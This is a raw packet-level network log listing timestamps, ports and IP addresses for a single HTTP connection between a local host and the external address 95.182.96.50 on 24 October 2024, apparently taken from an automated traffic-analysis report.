Oct 24, 2024 13:54:20.305259943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305269003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305269003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305282116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305284977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305299044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305303097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305319071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305325985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305334091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305346966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305598021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305613041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305629015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305639982 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305645943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305658102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305663109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305670977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305680990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305691004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305697918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305706978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305716038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305728912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305732965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305737019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305749893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305758953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305768013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305778980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305783987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305794954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305813074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305823088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305831909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305849075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305866003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305881023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305881023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305900097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305907011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305919886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305927992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305963039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305965900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305984020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305999041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306005955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306035995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306067944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306077003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306118011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306158066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306174994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306197882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306212902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306256056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306272984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306298971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306323051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306413889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306431055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306447029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306456089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306471109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306495905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306582928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306598902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306617022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306622028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306633949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306642056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306659937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306663036 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306684017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306690931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306701899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306710958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306718111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306729078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306736946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306751966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306756020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306756020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306778908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306780100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306797981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306799889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306826115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306828022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306842089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306854963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306859970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.306874037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306895971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.306912899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307013988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307039022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307054043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307054043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307071924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307075977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307087898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307111979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307147980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307164907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307179928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307193995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307199001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307199001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307212114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307224035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307228088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.307249069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307256937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.307281017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420093060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420142889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420169115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420190096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420203924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420249939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420262098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420295954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420306921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420331001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420331955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420368910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420373917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420404911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420409918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420444012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420450926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420494080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420509100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420555115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420564890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420595884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420607090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420630932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420634985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420667887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420677900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420698881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420708895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420733929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420742035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420770884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420772076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420806885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420815945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420845032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420850992 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420885086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420896053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420918941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420923948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420953989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420959949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.420989037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.420996904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.421022892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.421029091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.421058893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.421063900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.421101093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.499931097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.505374908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.730149031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.730279922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.730499983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.730557919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.732786894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.732824087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.732860088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.732882023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.732893944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.732945919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.732980013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733012915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733047962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733098984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733124018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733124018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733124971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733124971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733124971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733133078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733169079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733181953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733201981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733216047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733273029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733310938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733323097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733331919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733345985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733355999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733380079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733422041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733422041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733455896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733462095 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733490944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733524084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733545065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733556032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733566046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733602047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733608007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733656883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733690977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733725071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733732939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733732939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733766079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733774900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733809948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733824015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733845949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733858109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733880043 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733891010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733912945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733917952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.733968019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.733975887 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734003067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734035969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734051943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734061956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734071016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734101057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734106064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734138966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734144926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734174967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734208107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734239101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734241962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734247923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734276056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734309912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734321117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734343052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734344959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734380007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734414101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734421968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734450102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734483004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734493971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734517097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734529018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734555006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734556913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734591007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734606981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734630108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734642982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734678030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734683990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734711885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734718084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734746933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734761953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734776020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734787941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734828949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734863997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734875917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734898090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734915018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734932899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.734941006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734980106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.734982014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735018015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735032082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735052109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735059023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735090017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735093117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735126019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735136032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735162973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735171080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735197067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735207081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735233068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735240936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735266924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735277891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735301018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735310078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735342979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735367060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735400915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735433102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735445023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735475063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735491037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735523939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735558033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735569000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735591888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735625029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735629082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735657930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735692978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735702038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735726118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735732079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735764027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735791922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.735810041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.735832930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.844985008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.845045090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.845055103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.845079899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.845091105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.845413923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847167969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847219944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847234011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847268105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847275972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847343922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847378016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.847390890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.847417116 CEST	80	49714	95.182.96.50	192.168.2.6
